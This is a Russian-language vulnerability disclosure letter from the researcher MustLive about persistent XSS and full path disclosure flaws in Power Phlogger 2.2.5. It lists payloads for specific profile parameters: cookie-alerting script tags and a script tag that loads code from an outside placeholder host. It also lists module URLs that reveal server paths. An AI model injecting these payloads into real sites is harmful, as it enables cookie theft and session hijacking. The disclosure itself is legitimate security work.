Здравствуйте 3APA3A!
Сообщаю вам о найденных мною новых Cross-Site Scripting и Full path disclosure уязвимостях в Power
Phlogger.
XSS (Persistent):
POST запрос на странице http://site/edUserprofile.php (возможны как GET, так и POST запросы):
</textarea><script>alert(document.cookie)</script>
В параметре: N_your_url.
"><script>alert(document.cookie)</script>
В параметре: N_email.
"><script src=http://site.com
В параметрах: N_fg_c, N_bg_c (ограничение в 30 символов).
XSS:
Full path disclosure:
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2112/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua